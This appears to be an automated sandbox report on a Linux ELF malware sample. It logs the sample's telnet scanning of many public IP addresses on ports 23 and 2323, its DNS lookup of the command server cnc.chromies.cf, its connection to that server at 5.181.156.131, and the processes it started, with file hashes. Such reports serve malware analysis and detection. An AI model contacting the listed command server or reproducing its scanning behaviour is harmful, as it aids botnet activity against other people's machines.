                        Dec 2, 2023 10:40:42.198911905 CET5066823192.168.2.2362.226.42.10
                        Dec 2, 2023 10:40:42.198911905 CET506682323192.168.2.23130.196.90.228
                        Dec 2, 2023 10:40:42.198911905 CET5066823192.168.2.2394.65.203.202
                        Dec 2, 2023 10:40:42.198920012 CET5066823192.168.2.23160.161.140.42
                        Dec 2, 2023 10:40:42.198920012 CET5066823192.168.2.23115.24.155.157
                        Dec 2, 2023 10:40:42.198926926 CET5066823192.168.2.23184.140.8.43
                        Dec 2, 2023 10:40:42.198928118 CET5066823192.168.2.2378.62.94.174
                        Dec 2, 2023 10:40:42.198960066 CET5066823192.168.2.2358.227.250.19
                        Dec 2, 2023 10:40:42.198960066 CET5066823192.168.2.23212.0.127.156
                        Dec 2, 2023 10:40:42.198961973 CET5066823192.168.2.23125.103.235.196
                        Dec 2, 2023 10:40:42.198962927 CET5066823192.168.2.23206.203.55.140
                        Dec 2, 2023 10:40:42.198961973 CET5066823192.168.2.2377.85.221.133
                        Dec 2, 2023 10:40:42.198965073 CET5066823192.168.2.23125.39.42.168
                        Dec 2, 2023 10:40:42.198965073 CET5066823192.168.2.23193.70.187.108
                        Dec 2, 2023 10:40:42.198965073 CET5066823192.168.2.23212.44.214.33
                        Dec 2, 2023 10:40:42.198962927 CET5066823192.168.2.23119.12.233.182
                        Dec 2, 2023 10:40:42.198965073 CET5066823192.168.2.23145.71.37.225
                        Dec 2, 2023 10:40:42.198965073 CET5066823192.168.2.2379.50.122.112
                        Dec 2, 2023 10:40:42.198968887 CET5066823192.168.2.23171.94.170.218
                        Dec 2, 2023 10:40:42.198978901 CET5066823192.168.2.2336.111.26.125
                        Dec 2, 2023 10:40:42.198997974 CET5066823192.168.2.23177.137.204.27
                        Dec 2, 2023 10:40:42.198997974 CET506682323192.168.2.2318.131.21.145
                        Dec 2, 2023 10:40:42.198997974 CET5066823192.168.2.23197.180.125.32
                        Dec 2, 2023 10:40:42.198997974 CET5066823192.168.2.23133.39.111.22
                        Dec 2, 2023 10:40:42.199012041 CET5066823192.168.2.23126.169.15.171
                        Dec 2, 2023 10:40:42.199012041 CET5066823192.168.2.23221.58.3.209
                        Dec 2, 2023 10:40:42.199028015 CET5066823192.168.2.2317.35.139.174
                        Dec 2, 2023 10:40:42.199028015 CET5066823192.168.2.23181.251.177.232
                        Dec 2, 2023 10:40:42.199028015 CET506682323192.168.2.2388.111.124.116
                        Dec 2, 2023 10:40:42.199028015 CET5066823192.168.2.23175.13.229.147
                        Dec 2, 2023 10:40:42.199033022 CET5066823192.168.2.23120.172.11.34
                        Dec 2, 2023 10:40:42.199038029 CET5066823192.168.2.23206.71.87.1
                        Dec 2, 2023 10:40:42.199049950 CET506682323192.168.2.2398.45.121.84
                        Dec 2, 2023 10:40:42.199062109 CET5066823192.168.2.23188.70.160.183
                        Dec 2, 2023 10:40:42.199063063 CET5066823192.168.2.23218.13.233.114
                        Dec 2, 2023 10:40:42.199070930 CET5066823192.168.2.23148.120.207.154
                        Dec 2, 2023 10:40:42.199089050 CET5066823192.168.2.2378.123.198.188
                        Dec 2, 2023 10:40:42.199090004 CET506682323192.168.2.2391.127.87.93
                        Dec 2, 2023 10:40:42.199095964 CET5066823192.168.2.2399.73.102.72
                        Dec 2, 2023 10:40:42.199095964 CET5066823192.168.2.23174.26.189.238
                        Dec 2, 2023 10:40:42.199095964 CET5066823192.168.2.23156.140.176.91
                        Dec 2, 2023 10:40:42.199110031 CET5066823192.168.2.2340.60.48.214
                        Dec 2, 2023 10:40:42.199119091 CET5066823192.168.2.23194.27.240.62
                        Dec 2, 2023 10:40:42.199119091 CET5066823192.168.2.2367.141.104.193
                        Dec 2, 2023 10:40:42.199119091 CET5066823192.168.2.2313.203.82.233
                        Dec 2, 2023 10:40:42.199155092 CET5066823192.168.2.2386.59.111.192
                        Dec 2, 2023 10:40:42.199157000 CET5066823192.168.2.2327.138.209.196
                        Dec 2, 2023 10:40:42.199157000 CET5066823192.168.2.23144.29.176.244
                        Dec 2, 2023 10:40:42.199157000 CET5066823192.168.2.23158.95.208.155
                        Dec 2, 2023 10:40:42.199157000 CET5066823192.168.2.2336.63.136.157
                        Dec 2, 2023 10:40:42.199163914 CET5066823192.168.2.23199.113.28.97
                        Dec 2, 2023 10:40:42.199168921 CET5066823192.168.2.23207.171.66.168
                        Dec 2, 2023 10:40:42.199168921 CET506682323192.168.2.2313.31.100.69
                        Dec 2, 2023 10:40:42.199194908 CET5066823192.168.2.23101.6.70.149
                        Dec 2, 2023 10:40:42.199196100 CET5066823192.168.2.23211.68.230.51
                        Dec 2, 2023 10:40:42.199206114 CET5066823192.168.2.23181.84.231.161
                        Dec 2, 2023 10:40:42.199208021 CET5066823192.168.2.23198.123.50.158
                        Dec 2, 2023 10:40:42.199208021 CET506682323192.168.2.2346.118.172.41
                        Dec 2, 2023 10:40:42.199208021 CET5066823192.168.2.23181.204.129.102
                        Dec 2, 2023 10:40:42.199213982 CET5066823192.168.2.2389.222.47.143
                        Dec 2, 2023 10:40:42.199213982 CET5066823192.168.2.23212.14.57.168
                        Dec 2, 2023 10:40:42.199218035 CET5066823192.168.2.23148.224.41.40
                        Dec 2, 2023 10:40:42.199218035 CET5066823192.168.2.238.98.86.54
                        Dec 2, 2023 10:40:42.199246883 CET5066823192.168.2.23164.144.76.84
                        Dec 2, 2023 10:40:42.199248075 CET5066823192.168.2.23185.42.79.148
                        Dec 2, 2023 10:40:42.199249983 CET5066823192.168.2.23206.136.12.28
                        Dec 2, 2023 10:40:42.199258089 CET5066823192.168.2.2377.33.192.166
                        Dec 2, 2023 10:40:42.199260950 CET5066823192.168.2.23171.115.154.75
                        Dec 2, 2023 10:40:42.199260950 CET506682323192.168.2.2313.44.198.176
                        Dec 2, 2023 10:40:42.199265957 CET5066823192.168.2.23161.184.31.138
                        Dec 2, 2023 10:40:42.199265957 CET5066823192.168.2.23174.202.22.139
                        Dec 2, 2023 10:40:42.199265957 CET5066823192.168.2.2370.133.213.108
                        Dec 2, 2023 10:40:42.199265957 CET5066823192.168.2.238.218.182.65
                        Dec 2, 2023 10:40:42.199284077 CET5066823192.168.2.23125.175.223.218
                        Dec 2, 2023 10:40:42.199285030 CET5066823192.168.2.23178.159.62.32
                        Dec 2, 2023 10:40:42.199306965 CET5066823192.168.2.23194.44.8.56
                        Dec 2, 2023 10:40:42.199307919 CET5066823192.168.2.2324.76.212.86
                        Dec 2, 2023 10:40:42.199307919 CET5066823192.168.2.2357.188.233.206
                        Dec 2, 2023 10:40:42.199309111 CET5066823192.168.2.23196.218.233.144
                        Dec 2, 2023 10:40:42.199309111 CET5066823192.168.2.23136.10.238.101
                        Dec 2, 2023 10:40:42.199335098 CET5066823192.168.2.2391.252.152.142
                        Dec 2, 2023 10:40:42.199347973 CET5066823192.168.2.2384.154.155.61
                        Dec 2, 2023 10:40:42.199348927 CET5066823192.168.2.23179.227.182.27
                        Dec 2, 2023 10:40:42.199348927 CET5066823192.168.2.23151.240.16.181
                        Dec 2, 2023 10:40:42.199348927 CET506682323192.168.2.23216.236.196.217
                        Dec 2, 2023 10:40:42.199377060 CET506682323192.168.2.23133.129.157.205
                        Dec 2, 2023 10:40:42.199378014 CET5066823192.168.2.23200.133.25.180
                        Dec 2, 2023 10:40:42.199378014 CET5066823192.168.2.23179.74.147.77
                        Dec 2, 2023 10:40:42.199378014 CET5066823192.168.2.23122.31.229.252
                        Dec 2, 2023 10:40:42.199378014 CET5066823192.168.2.23103.221.61.30
                        Dec 2, 2023 10:40:42.199389935 CET5066823192.168.2.23135.79.72.207
                        Dec 2, 2023 10:40:42.199389935 CET5066823192.168.2.23146.107.136.54
                        Dec 2, 2023 10:40:42.199389935 CET5066823192.168.2.2390.153.3.86
                        Dec 2, 2023 10:40:42.199418068 CET5066823192.168.2.23193.240.55.238
                        Dec 2, 2023 10:40:42.199418068 CET5066823192.168.2.23103.33.102.93
                        Dec 2, 2023 10:40:42.199425936 CET5066823192.168.2.23186.42.230.184
                        Dec 2, 2023 10:40:42.199425936 CET5066823192.168.2.2382.32.163.85
                        Dec 2, 2023 10:40:42.199429989 CET5066823192.168.2.2353.169.244.9
                        Dec 2, 2023 10:40:42.199441910 CET5066823192.168.2.23157.69.145.6
                        Dec 2, 2023 10:40:42.199450970 CET5066823192.168.2.23161.84.130.219
                        Dec 2, 2023 10:40:42.201750994 CET5066823192.168.2.23101.181.206.78
                        Dec 2, 2023 10:40:42.356878996 CET2350668206.71.87.1192.168.2.23
                        Dec 2, 2023 10:40:42.478724957 CET235066827.138.209.196192.168.2.23
                        Dec 2, 2023 10:40:42.517479897 CET23506688.218.182.65192.168.2.23
                        Dec 2, 2023 10:40:44.495651960 CET392222609192.168.2.235.181.156.131
                        Dec 2, 2023 10:40:44.714015007 CET2609392225.181.156.131192.168.2.23
                        Dec 2, 2023 10:40:44.714066029 CET2609392225.181.156.131192.168.2.23
                        Dec 2, 2023 10:40:44.714109898 CET392222609192.168.2.235.181.156.131
                        Dec 2, 2023 10:40:49.994828939 CET4251680192.168.2.23109.202.202.202
                        Dec 2, 2023 10:40:54.090380907 CET43928443192.168.2.2391.189.91.42
                        Dec 2, 2023 10:40:59.968754053 CET2609392225.181.156.131192.168.2.23
                        Dec 2, 2023 10:40:59.969041109 CET392222609192.168.2.235.181.156.131
                        Dec 2, 2023 10:41:15.186775923 CET2609392225.181.156.131192.168.2.23
                        Dec 2, 2023 10:41:15.186906099 CET392222609192.168.2.235.181.156.131
                        Dec 2, 2023 10:41:30.404751062 CET2609392225.181.156.131192.168.2.23
                        Dec 2, 2023 10:41:30.404881954 CET392222609192.168.2.235.181.156.131
                        Dec 2, 2023 10:41:35.044524908 CET43928443192.168.2.2391.189.91.42
                        Dec 2, 2023 10:41:44.755208015 CET392222609192.168.2.235.181.156.131
                        Dec 2, 2023 10:41:44.973865032 CET2609392225.181.156.131192.168.2.23
                        Dec 2, 2023 10:41:44.974071980 CET392222609192.168.2.235.181.156.131
                        Dec 2, 2023 10:42:00.192845106 CET2609392225.181.156.131192.168.2.23
                        Dec 2, 2023 10:42:00.192997932 CET392222609192.168.2.235.181.156.131
                        Dec 2, 2023 10:42:15.411001921 CET2609392225.181.156.131192.168.2.23
                        Dec 2, 2023 10:42:15.411123991 CET392222609192.168.2.235.181.156.131
                        Dec 2, 2023 10:42:30.628829956 CET2609392225.181.156.131192.168.2.23
                        Dec 2, 2023 10:42:30.628971100 CET392222609192.168.2.235.181.156.131
                        TimestampSource PortDest PortSource IPDest IP
                        Dec 2, 2023 10:40:34.169975996 CET5611753192.168.2.238.8.8.8
                        Dec 2, 2023 10:40:34.268347025 CET53561178.8.8.8192.168.2.23
                        TimestampSource IPDest IPChecksumCodeType
                        Dec 2, 2023 10:40:34.294517040 CET209.6.189.69192.168.2.234e19(Unknown)Destination Unreachable
                        Dec 2, 2023 10:40:34.343605995 CET200.95.144.1192.168.2.23fbe8(Time to live exceeded in transit)Time Exceeded
                        Dec 2, 2023 10:40:34.497612000 CET181.13.217.248192.168.2.23923f(Time to live exceeded in transit)Time Exceeded
                        Dec 2, 2023 10:40:35.378021955 CET85.208.48.224192.168.2.234680(Unknown)Destination Unreachable
                        Dec 2, 2023 10:40:35.391752005 CET93.163.244.194192.168.2.23e488(Unknown)Destination Unreachable
                        Dec 2, 2023 10:40:36.302561998 CET96.127.240.46192.168.2.2345ef(Time to live exceeded in transit)Time Exceeded
                        Dec 2, 2023 10:40:36.346564054 CET162.255.183.254192.168.2.23e01b(Time to live exceeded in transit)Time Exceeded
                        Dec 2, 2023 10:40:36.361829042 CET186.145.56.140192.168.2.23b2f4(Port unreachable)Destination Unreachable
                        Dec 2, 2023 10:40:36.379673958 CET141.31.99.253192.168.2.232ed3(Port unreachable)Destination Unreachable
                        Dec 2, 2023 10:40:36.380152941 CET46.142.180.176192.168.2.2353b0(Unknown)Destination Unreachable
                        Dec 2, 2023 10:40:36.386151075 CET149.11.65.234192.168.2.23a030(Net unreachable)Destination Unreachable
                        Dec 2, 2023 10:40:36.494514942 CET45.204.91.25192.168.2.2348b5(Unknown)Destination Unreachable
                        Dec 2, 2023 10:40:37.315330982 CET97.85.69.249192.168.2.23671b(Unknown)Destination Unreachable
                        Dec 2, 2023 10:40:37.340475082 CET209.163.77.109192.168.2.23dee7(Port unreachable)Destination Unreachable
                        Dec 2, 2023 10:40:37.345858097 CET74.48.199.36192.168.2.23d124(Unknown)Destination Unreachable
                        Dec 2, 2023 10:40:37.469652891 CET100.70.201.222192.168.2.2379cd(Host unreachable)Destination Unreachable
                        Dec 2, 2023 10:40:37.508351088 CET123.63.229.225192.168.2.2346a8(Unknown)Destination Unreachable
                        Dec 2, 2023 10:40:39.394290924 CET185.29.88.230192.168.2.2366e(Time to live exceeded in transit)Time Exceeded
                        Dec 2, 2023 10:40:39.394382000 CET130.185.38.174192.168.2.238d87(Unknown)Destination Unreachable
                        Dec 2, 2023 10:40:40.219499111 CET121.177.8.62192.168.2.23ee8c(Host unreachable)Destination Unreachable
                        Dec 2, 2023 10:40:41.395802975 CET185.14.235.251192.168.2.2364c3(Host unreachable)Destination Unreachable
                        Dec 2, 2023 10:40:41.415173054 CET160.80.176.2192.168.2.23f8f1(Time to live exceeded in transit)Time Exceeded
                        Dec 2, 2023 10:40:41.419146061 CET177.131.91.200192.168.2.23cd28(Host unreachable)Destination Unreachable
                        Dec 2, 2023 10:40:42.406603098 CET84.154.155.61192.168.2.234717(Unknown)Destination Unreachable
                        Dec 2, 2023 10:40:42.418157101 CET217.234.17.112192.168.2.234b94(Unknown)Destination Unreachable
                        Dec 2, 2023 10:40:42.421128988 CET62.226.42.10192.168.2.23ce02(Unknown)Destination Unreachable
                        Dec 2, 2023 10:40:43.492343903 CET112.174.153.126192.168.2.23defc(Host unreachable)Destination Unreachable
                        Dec 2, 2023 10:40:44.980824947 CET206.252.252.250192.168.2.23cd8f(Host unreachable)Destination Unreachable
                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                        Dec 2, 2023 10:40:34.169975996 CET192.168.2.238.8.8.80xb0d2Standard query (0)cnc.chromies.cfA (IP address)IN (0x0001)false
                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                        Dec 2, 2023 10:40:34.268347025 CET8.8.8.8192.168.2.230xb0d2No error (0)cnc.chromies.cf5.181.156.131A (IP address)IN (0x0001)false

                        System Behavior

                        Start time (UTC):09:40:26
                        Start date (UTC):02/12/2023
                        Path:/usr/bin/dash
                        Arguments:-
                        File size:129816 bytes
                        MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                        Start time (UTC):09:40:26
                        Start date (UTC):02/12/2023
                        Path:/usr/bin/rm
                        Arguments:rm -f /tmp/tmp.o6Plogs1yr /tmp/tmp.qA58EAPoKE /tmp/tmp.KPTn6A0K4J
                        File size:72056 bytes
                        MD5 hash:aa2b5496fdbfd88e38791ab81f90b95b

                        Start time (UTC):09:40:33
                        Start date (UTC):02/12/2023
                        Path:/tmp/gJxUBR0ghC.elf
                        Arguments:/tmp/gJxUBR0ghC.elf
                        File size:4379400 bytes
                        MD5 hash:7dc1c0e23cd5e102bb12e5c29403410e

                        Start time (UTC):09:40:33
                        Start date (UTC):02/12/2023
                        Path:/tmp/gJxUBR0ghC.elf
                        Arguments:-
                        File size:4379400 bytes
                        MD5 hash:7dc1c0e23cd5e102bb12e5c29403410e

                        Start time (UTC):09:40:33
                        Start date (UTC):02/12/2023
                        Path:/tmp/gJxUBR0ghC.elf
                        Arguments:-
                        File size:4379400 bytes
                        MD5 hash:7dc1c0e23cd5e102bb12e5c29403410e

                        Start time (UTC):09:40:33
                        Start date (UTC):02/12/2023
                        Path:/tmp/gJxUBR0ghC.elf
                        Arguments:-
                        File size:4379400 bytes
                        MD5 hash:7dc1c0e23cd5e102bb12e5c29403410e

                        Start time (UTC):09:40:33
                        Start date (UTC):02/12/2023
                        Path:/tmp/gJxUBR0ghC.elf
                        Arguments:-
                        File size:4379400 bytes
                        MD5 hash:7dc1c0e23cd5e102bb12e5c29403410e
                        Start time (UTC):09:40:39
                        Start date (UTC):02/12/2023
                        Path:/usr/bin/xfce4-panel
                        Arguments:-
                        File size:375768 bytes
                        MD5 hash:a15b657c7d54ac1385f1f15004ea6784

                        Start time (UTC):09:40:39
                        Start date (UTC):02/12/2023
                        Path:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0
                        Arguments:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libsystray.so 6 12582920 systray "Notification Area" "Area where notification icons appear"
                        File size:35136 bytes
                        MD5 hash:ac0b8a906f359a8ae102244738682e76

                        Start time (UTC):09:40:39
                        Start date (UTC):02/12/2023
                        Path:/usr/bin/xfce4-panel
                        Arguments:-
                        File size:375768 bytes
                        MD5 hash:a15b657c7d54ac1385f1f15004ea6784

                        Start time (UTC):09:40:39
                        Start date (UTC):02/12/2023
                        Path:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0
                        Arguments:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libstatusnotifier.so 7 12582921 statusnotifier "Status Notifier Plugin" "Provides a panel area for status notifier items (application indicators)"
                        File size:35136 bytes
                        MD5 hash:ac0b8a906f359a8ae102244738682e76

                        Start time (UTC):09:40:39
                        Start date (UTC):02/12/2023
                        Path:/usr/bin/xfce4-panel
                        Arguments:-
                        File size:375768 bytes
                        MD5 hash:a15b657c7d54ac1385f1f15004ea6784

                        Start time (UTC):09:40:39
                        Start date (UTC):02/12/2023
                        Path:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0
                        Arguments:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libpulseaudio-plugin.so 8 12582922 pulseaudio "PulseAudio Plugin" "Adjust the audio volume of the PulseAudio sound system"
                        File size:35136 bytes
                        MD5 hash:ac0b8a906f359a8ae102244738682e76

                        Start time (UTC):09:40:39
                        Start date (UTC):02/12/2023
                        Path:/usr/bin/xfce4-panel
                        Arguments:-
                        File size:375768 bytes
                        MD5 hash:a15b657c7d54ac1385f1f15004ea6784

                        Start time (UTC):09:40:39
                        Start date (UTC):02/12/2023
                        Path:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0
                        Arguments:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libxfce4powermanager.so 9 12582923 power-manager-plugin "Power Manager Plugin" "Display the battery levels of your devices and control the brightness of your display"
                        File size:35136 bytes
                        MD5 hash:ac0b8a906f359a8ae102244738682e76

                        Start time (UTC):09:40:39
                        Start date (UTC):02/12/2023
                        Path:/usr/bin/xfce4-panel
                        Arguments:-
                        File size:375768 bytes
                        MD5 hash:a15b657c7d54ac1385f1f15004ea6784

                        Start time (UTC):09:40:39
                        Start date (UTC):02/12/2023
                        Path:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0
                        Arguments:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libnotification-plugin.so 10 12582924 notification-plugin "Notification Plugin" "Notification plugin for the Xfce panel"
                        File size:35136 bytes
                        MD5 hash:ac0b8a906f359a8ae102244738682e76

                        Start time (UTC):09:40:39
                        Start date (UTC):02/12/2023
                        Path:/usr/bin/xfce4-panel
                        Arguments:-
                        File size:375768 bytes
                        MD5 hash:a15b657c7d54ac1385f1f15004ea6784

                        Start time (UTC):09:40:39
                        Start date (UTC):02/12/2023
                        Path:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0
                        Arguments:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libactions.so 14 12582925 actions "Action Buttons" "Log out, lock or other system actions"
                        File size:35136 bytes
                        MD5 hash:ac0b8a906f359a8ae102244738682e76